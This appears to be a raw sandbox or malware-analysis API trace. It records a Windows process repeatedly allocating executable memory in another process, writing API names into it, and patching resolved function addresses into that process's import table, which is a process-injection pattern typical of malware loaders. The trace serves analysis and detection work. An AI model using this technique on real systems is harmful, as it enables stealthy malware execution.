	[0187.864] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.865] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.865] ResetEvent (hEvent=0x478) returned 1
	[0187.865] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.865] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.866] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.866] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.866] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.866] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055218, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.866] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.866] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.866] lstrlenA (lpString="VirtualProtectEx") returned 16
	[0187.866] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.866] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb748a*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb748a*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.867] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.867] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.867] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.867] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.868] ResetEvent (hEvent=0x478) returned 1
	[0187.868] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.868] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.868] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.868] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.868] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.868] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005521c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.869] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.869] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.869] lstrlenA (lpString="GetFileSize") returned 11
	[0187.869] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.869] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb749e*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb749e*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.869] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.869] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.869] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.870] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.870] ResetEvent (hEvent=0x478) returned 1
	[0187.870] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.870] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.870] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.870] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.870] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055220, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.871] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.871] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.871] lstrlenA (lpString="CreateNamedPipeA") returned 16
	[0187.871] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.871] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb74ac*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb74ac*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.872] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.872] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.872] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.872] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.872] ResetEvent (hEvent=0x478) returned 1
	[0187.872] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.872] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.873] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.873] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.873] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055224, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.873] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.873] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.873] lstrlenA (lpString="EncodePointer") returned 13
	[0187.873] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.873] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb74c0*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb74c0*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.874] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.874] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.874] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.874] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.875] ResetEvent (hEvent=0x478) returned 1
	[0187.875] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.875] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.875] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.875] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.875] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.875] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055228, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.876] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.876] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.876] lstrlenA (lpString="RaiseException") returned 14
	[0187.876] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.876] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb74d0*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb74d0*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.876] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.876] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.876] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.877] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.877] ResetEvent (hEvent=0x478) returned 1
	[0187.877] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.877] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.877] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.877] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.877] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.877] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005522c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.878] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.878] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.878] lstrlenA (lpString="InterlockedFlushSList") returned 21
	[0187.878] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.878] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb74e2*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb74e2*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0187.878] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.878] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.878] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.879] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.879] ResetEvent (hEvent=0x478) returned 1
	[0187.879] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.879] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.879] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.879] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.879] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.879] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055230, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.880] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.880] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.880] lstrlenA (lpString="RtlUnwind") returned 9
	[0187.880] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.880] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb74fa*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb74fa*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.880] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.881] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.881] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.881] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.881] ResetEvent (hEvent=0x478) returned 1
	[0187.881] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.882] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.882] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.882] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.882] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.882] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055234, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.882] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.882] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.882] lstrlenA (lpString="InitializeCriticalSectionAndSpinCount") returned 37
	[0187.882] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.883] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7506*, nSize=0x26, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7506*, lpNumberOfBytesWritten=0x12857c*=0x26) returned 1
	[0187.883] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.883] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.883] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.883] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.884] ResetEvent (hEvent=0x478) returned 1
	[0187.884] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.884] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.884] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.884] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.884] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.884] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055238, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.884] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.885] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.885] lstrlenA (lpString="TlsAlloc") returned 8
	[0187.885] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.885] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb752e*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb752e*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.885] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.885] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.885] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.885] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.886] ResetEvent (hEvent=0x478) returned 1
	[0187.886] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.886] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.886] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.886] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.886] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.886] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005523c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.887] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.887] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.887] lstrlenA (lpString="TlsGetValue") returned 11
	[0187.887] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.887] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb753a*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb753a*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.888] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.888] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.888] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.888] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.888] ResetEvent (hEvent=0x478) returned 1
	[0187.888] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.889] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.889] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.889] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.889] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
